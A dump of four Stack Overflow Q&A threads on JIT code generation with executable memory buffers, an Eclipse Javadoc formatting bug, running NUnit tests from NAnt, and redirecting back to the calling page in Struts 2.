"url": "https://stackoverflow.com/questions/45407",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "16"
} |
Q: JIT code generation techniques How does a virtual machine generate native machine code on the fly and execute it?
Assuming you can figure out what are the native machine op-codes you want to emit, how do you go about actually running it?
Is it something as hacky as mapping the mnemonic instructions to binary codes, stuffing it into an char* pointer and casting it as a function and executing?
Or would you generate a temporary shared library (.dll or .so or whatever) and load it into memory using standard functions like LoadLibrary ?
A: You can just make the program counter point to the code you want to execute. Remember that data can be data or code. On x86 the program counter is the EIP register. The IP part of EIP stands for instruction pointer. The JMP instruction is called to jump to an address. After the jump EIP will contain this address.
Is it something as hacky as mapping the mnemonic instructions to binary codes, stuffing it into an char* pointer and casting it as a function and executing?
Yes. This is one way of doing it. The resulting code would be cast to a pointer to function in C.
A:
Is it something as hacky as mapping the mnemonic instructions to binary codes, stuffing it into an char* pointer and casting it as a function and executing?
Yes, if you were doing it in C or C++ (or something similar), that's exactly what you'd do.
It appears hacky, but that's actually an artifact of the language design. Remember, the actual algorithm you want to use is very simple: determine what instructions you want to use, load them into a buffer in memory, and jump to the beginning of that buffer.
If you really try to do this, though, make sure you get the calling convention right when you return to your C program. I think if I wanted to generate code I'd look for a library to take care of that aspect for me. Nanojit's been in the news recently; you could look at that.
A: Yup. You just build up a char* and execute it. However, you need to note a couple details. The char* must be in an executable section of memory and must have proper alignment.
In addition to nanojit you can also check out LLVM which is another library that's capable of compiling various program representations down to a function pointer. It's interface is clean and the generated code tends to be efficient.
A: As far as i know it compiles everything in memory because it has to run some heuristics to to optimize the code (i.e.: inlining over time) but you can have a look at the Shared Source Common Language Infrastructure 2.0 rotor release. The whole codebase is identical to .NET except for the Jitter and the GC.
A: As well as Rotor 2.0 - you could also take a look at the HotSpot virtual machine in the OpenJDK.
A: About generating a DLL: the additional required I/O for that, plus linking, plus the complexity of generating the DLL format, would make that much more complicate, and above all they'd kill performance; additionally, in the end you still call a function pointer to the loaded code, so...
Also, JIT compilation can happen one method at a time, and if you want to do that you'd generate lots of small DLLs.
About the "executable section" requirement, calling mprotect() on POSIX systems can fix the permissions (there's a similar API on Win32). You need to do that for a big memory segment instead that once per method since it'd be too slow otherwise.
On plain x86 you wouldn't notice the problem, on x86 with PAE or 64bit AMD64/Intel 64 bit machines you'd get a segfault.
A:
Is it something as hacky as mapping
the mnemonic instructions to binary
codes, stuffing it into an char*
pointer and casting it as a function
and executing?
Yes, that works.
To do this in windows you must set PAGE_EXECUTE_READWRITE to the allocated block:
void (*MyFunc)() = (void (*)()) VirtualAlloc(NULL, sizeofblock, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
//Now fill up the block with executable code and issue-
MyFunc();
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45408",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "19"
} |
Q: Why does the Eclipse code formatter break in a Javadoc @see tag? I'm using Eclipse 3.4 and have configured the Java code formatter with all of the options on the Comments tab enabled. The problem is that when I format a document comment that contains:
* @see <a href="test.html">test</a>
the code formatter inserts a space in the closing HTML, breaking it:
* @see <a href="test.html">test< /a>
Why? How do I stop this happening?
This is not fixed by disabling any of the options on the Comments tab, such as Format HTML tags. The only work-around I found is to disable Javadoc formatting completely by disabling both the Enable Javadoc comment formatting and Enable block comment formatting options, which means I then have to format comment blocks manually.
A: I can only assume it's a bug in Eclipse. It only happens with @see tags, it happens also for all 3 builtin code formatter settings.
There are some interesting bugs reported already in the neighbourhood, but I couldn't find this specific one. See for example a search for @see in the Eclipse Bugzilla.
A: Strict XML specifications require that the self closing tags should have a space before the closing slash like so:
<gcServer enabled="true" /> <!-- note the space just after "true" -->
I can only assume, like Bart said, that there is a bug in Eclipse's reformatter that thinks the closing tag is actually a self-closing tag. Another idea: Can you verify that your a tags are balanced (i.e. no unclosed tags higher up in the document)?
A: This could be a bug in Eclipse 3.4. I'm using 3.3 (M20080221-1800), and do not observe this behavior.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45414",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "4"
} |
Q: How to run NUnit v2.4.8 tests with NAnt 0.86 beta? I tried recently to use NAnt (beta 0.86.2962.0) to run some unit tests compiled with the last stable version of NUnit (v2.4.8) without any success.
The error I get is the following :
[nunit2] Assembly "C:\Dev\MySample\bin\tests\My.Sample.Tests.dll" contains no tests.
Of course, the assembly contains tests that I can run from any runner, like NUnit one, TestDriven or Resharper. I would like to use <nunit2> task, and not directly the <exec> one, but I'm wondering if it is still possible, even using app.config files to bind assembly versions.
A: I can't remember why, but I gave up on using the <nunit2> task and I've been using the <exec> task and nunit-console.exe happily. If it helps, here's my test target that runs NUnit and FxCop. Note that it skips them if the executables aren't in the Windows path.
<target name="test" description="Run unit tests" depends="build">
<property name="windows-path" value="${string::to-lower(environment::get-variable('PATH'))}"/>
<property name="nunit-in-path"
value="${string::contains(windows-path, 'nunit')}"/>
<echo message="Tests skipped because no NUnit folder was found in the Windows path."
unless="${nunit-in-path}"/>
<exec program="nunit-console.exe" if="${nunit-in-path}">
<arg file="../MyProject/MyProjectTest.nunit"/>
</exec>
<property name="fxcop-in-path"
value="${string::contains(windows-path, 'fxcop')}"/>
<echo message="FxCop skipped because no FxCop folder was found in the Windows path."
unless="${fxcop-in-path}"/>
<fxcop projectFile="../MyProject/MyProject.fxcop" directOutputToConsole="true"
failOnAnalysisError="true" if="${fxcop-in-path}"/>
</target>
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45415",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: Struts 2: return to calling page I'm using Struts 2.
I'd like to return from an Action to the page which invoked it.
Say I'm in page x.jsp, I invoke Visual action to change CSS preferences in the session; I want to return to x.jsp rather than to a fixed page (i.e. home.jsp)
Here's the relevant struts.xml fragment:
<action
name="Visual"
class="it.___.web.actions.VisualizationAction">
<result name="home">/pages/home.jsp</result>
</action>
Of course my VisualizationAction.execute() returns home.
Is there any "magic" constant (like, say, INPUT_PAGE) that I may return to do the trick?
Must I use a more involved method (i.e. extracting the request page and forwarding to it)?
T.I.A.
A: You can use a dynamic result in struts.xml. For instance:
<action
name="Visual"
class="it.___.web.actions.VisualizationAction">
<result name="next">${next}</result>
</action>
Then in your action, you create a field called next. So to invoke the action you will pass the name of the page that you want to forward to next. The action then returns "next" and struts will know which page to go to.
There is a nicer explanation on this post: Stack Overflow
A: return INPUT;
will do the trick. INPUT constant is defined in Action interface itself. It indicates that action needs more input.
By calling page if you meant the page that took you to the action input page, then your input page will have to store HTTP header "Referer" in the request scope for the Action.
A: My solution would involve one interface and one interceptor. You implement the following interface for all actions to which you are likely to want to redirect:
public interface TargetAware {
public String getTarget();
public void setTarget(String target);
}
The interceptor simply ensures that the target is set, if required:
public class SetTargetInterceptor extends MethodFilterInterceptor implements Interceptor {
public String doIntercept(ActionInvocation invocation) {
Object action = invocation.getAction();
HttpServletRequest request = (HttpServletRequest) invocation.getInvocationContext().get(StrutsStatics.HTTP_REQUEST);
if (action instanceof TargetAware) {
TargetAware targetAwareAction = (TargetAware) action;
if (targetAwareAction.getTarget() == null)
targetAwareAction.setTarget(getCurrentUri(request));
}
return invocation.invoke();
}
// I'm sure we can find a better implementation of this...
private static String getCurrentUri(HttpServletRequest request) {
String uri = request.getRequestURI();
String queryString = request.getQueryString();
if (queryString != null && !queryString.equals(""))
uri += "?" + queryString;
return uri;
}
public void init() { /* do nothing */ }
public void destroy() { /* do nothing */ }
}
From then on, once these two bits are in place and your actions implement the TargetAware interface (if you expect to have to redirect to them), then you have access to a target parameter in your JSPs whenever you need it. Pass that parameter on to your VisualizationAction (which might as well implement also the TargetAware interface!), and on SUCCESS, redirect as explained by Vincent Ramdhanie:
<action name="Visual" class="it.___.web.actions.VisualizationAction">
<result type="redirect">
<param name="location">${target}</param>
<param name="parse">true</param>
</result>
</action>
I did not try every single detail of this strategy. In particular, beware of the notation surrounding the redirect result type (depending on your specific version of Struts2: 2.0.x and 2.1.x may differ on this...).
A: I prefer the way when you navigating users by particular actions.
http://domain.com/myAction.action
You could use some parameter as indicator, that you want to change current design:
i.e.
http://domain.com/myAction.action?changeDesign=silver_theme
So then, you write some struts 2 interceptor, which logic is to check the presence of such parameter 'changeDesign', and this interceptor will do nessesary work of changing design and will control workflow. With interceptor you decouple your actions from crosscutting logic.
A: ok, in your class it.___.web.actions.VisualizationAction, you must return a string value containing INPUT, then, on struts.xml you have to set something like this:
<action name="Visual" class="it.___.web.actions.VisualizationAction">
<result name="input">yourJspPage.jsp</result>
</action>
this will lead you to the page you want.
This should work, I've been working on struts2 along 2 months
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45424",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.